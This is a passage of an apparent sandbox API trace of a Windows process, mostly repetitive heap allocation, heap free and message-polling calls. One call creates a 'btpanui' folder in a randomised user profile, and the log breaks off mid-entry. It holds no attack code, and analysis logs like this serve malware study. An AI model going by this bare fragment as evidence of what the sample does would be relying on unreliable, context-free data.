RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd5f8 [0203.575] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7e0 [0203.575] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd520 [0203.575] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd6b8 [0203.575] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec18 [0203.575] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd4a8 [0203.575] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0203.575] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd4c0 [0203.575] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318ba0 [0203.575] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.575] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd640 [0203.575] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0203.576] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.576] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fedd0 [0203.576] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd430 [0203.576] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6f0 [0203.576] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff3c0 [0203.576] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd430 [0203.576] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd568 [0203.576] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0203.576] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.576] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff1b8 [0203.576] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd400 [0203.576] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0203.576] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd3e8 [0203.576] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8b0 [0203.576] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0203.577] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e540 [0203.577] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.577] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff050 [0203.577] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd598 [0203.577] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0203.577] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd4d8 [0203.577] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.577] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8b0 [0203.577] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0203.577] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316880 [0203.577] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e080 [0203.577] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.577] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff1e0 [0203.577] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd568 [0203.577] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0203.577] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd460 [0203.578] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\btpanui" (normalized: "c:\\users\\rdhj0cnfevzx\\btpanui")) returned 0xffffffff [0203.578] GetLastError () returned 0x2 [0203.579] CreateDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\btpanui" (normalized: "c:\\users\\rdhj0cnfevzx\\btpanui"), lpSecurityAttributes=0x0) returned 1 [0203.580] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd460 | out: hHeap=0x12c0000) returned 1 [0203.580] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd568 | out: hHeap=0x12c0000) returned 1 [0203.580] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff1e0 | out: hHeap=0x12c0000) returned 1 [0203.580] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.580] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0203.580] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0203.581] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.581] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff050 [0203.581] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd460 [0203.581] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0203.581] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0203.581] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13165e0 [0203.581] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13165e0 | out: hHeap=0x12c0000) returned 1 [0203.581] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0203.581] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0203.581] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd460 | out: hHeap=0x12c0000) returned 1 [0203.581] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff050 | out: hHeap=0x12c0000) returned 1 [0203.581] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.581] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e080 | out: hHeap=0x12c0000) returned 1 [0203.582] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.582] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0203.582] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0203.582] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13165e0 [0203.582] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13165e0 | out: hHeap=0x12c0000) returned 1 [0203.582] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0203.582] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0203.582] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e280 [0203.582] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.582] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e280 | out: hHeap=0x12c0000) returned 1 [0203.582] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.582] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8b0 [0203.582] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0203.582] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316800 [0203.582] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316800 | out: hHeap=0x12c0000) returned 1 [0203.582] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0203.582] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0203.582] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e340 [0203.582] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.583] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e340 | out: hHeap=0x12c0000) returned 1 [0203.583] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.583] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8b0 [0203.583] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0203.583] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316880 [0203.583] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316880 | out: hHeap=0x12c0000) returned 1 [0203.583] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0203.583] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0203.583] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e400 [0203.583] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.583] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e400 | out: hHeap=0x12c0000) returned 1 [0203.583] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.583] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0203.583] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0203.583] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13166c0 [0203.583] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13166c0 | out: hHeap=0x12c0000) returned 1 [0203.583] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0203.583] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0203.583] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e600 [0203.583] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.583] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e600 | out: hHeap=0x12c0000) returned 1 [0203.583] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.583] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef850 [0203.584] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0203.584] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13167a0 [0203.584] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13167a0 | out: hHeap=0x12c0000) returned 1 [0203.584] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0203.584] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0203.584] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e140 [0203.584] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.584] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e140 | out: hHeap=0x12c0000) returned 1 [0203.584] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.584] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef850 [0203.584] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0203.584] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13167a0 [0203.584] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13167a0 | out: hHeap=0x12c0000) returned 1 [0203.584] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0203.584] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0203.584] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e4c0 [0203.584] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.584] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e4c0 | out: hHeap=0x12c0000) returned 1 [0203.584] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.584] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0203.584] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0203.585] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13166c0 | out: hHeap=0x12c0000) returned 1 [0203.585] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0203.585] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0203.585] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.585] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd568 | out: hHeap=0x12c0000) returned 1 [0203.585] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0203.585] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.585] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316600 | out: hHeap=0x12c0000) returned 1 [0203.585] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0203.585] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0203.585] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd460 | out: hHeap=0x12c0000) returned 1 [0203.585] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff078 | out: hHeap=0x12c0000) returned 1 [0203.585] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.585] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0203.585] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.585] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd658 | out: hHeap=0x12c0000) returned 1 [0203.586] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd640 | out: hHeap=0x12c0000) returned 1 [0203.586] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0203.586] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.586] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e240 | out: hHeap=0x12c0000) returned 1 [0203.586] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.586] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13167a0 | out: hHeap=0x12c0000) returned 1 [0203.586] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0203.586] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0203.586] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.586] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e4c0 | out: hHeap=0x12c0000) returned 1 [0203.586] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.586] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13167a0 | out: hHeap=0x12c0000) returned 1 [0203.586] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0203.586] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0203.587] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.587] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e400 | out: hHeap=0x12c0000) returned 1 [0203.587] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.776] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13165e0 | out: hHeap=0x12c0000) returned 1 [0203.776] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0203.776] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0203.777] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.777] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e640 | out: hHeap=0x12c0000) returned 1 [0203.777] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.777] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0203.777] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd640 | out: hHeap=0x12c0000) returned 1 [0203.777] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd568 | out: hHeap=0x12c0000) returned 1 [0203.777] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff078 | out: hHeap=0x12c0000) returned 1 [0203.777] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.777] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.777] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0203.777] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd658 | out: hHeap=0x12c0000) returned 1 [0203.777] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd640 | out: hHeap=0x12c0000) returned 1 [0203.777] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff078 | out: hHeap=0x12c0000) returned 1 [0203.777] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.778] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316800 | out: hHeap=0x12c0000) returned 1 [0203.778] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0203.778] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0203.778] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.778] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e0c0 | out: hHeap=0x12c0000) returned 1 [0203.778] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.778] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13166c0 | out: hHeap=0x12c0000) returned 1 [0203.778] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0203.778] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0203.778] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.778] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e3c0 | out: hHeap=0x12c0000) returned 1 [0203.778] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.778] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316880 | out: hHeap=0x12c0000) returned 1 [0203.778] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0203.778] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0203.778] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.778] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e340 | out: hHeap=0x12c0000) returned 1 [0203.778] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.778] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13165e0 | out: hHeap=0x12c0000) returned 1 [0203.779] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0203.779] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0203.779] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.779] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e140 | out: hHeap=0x12c0000) returned 1 [0203.779] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.779] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316880 | out: hHeap=0x12c0000) returned 1 [0203.779] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0203.779] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0203.779] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.779] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dfc0 | out: hHeap=0x12c0000) returned 1 [0203.779] PeekMessageW 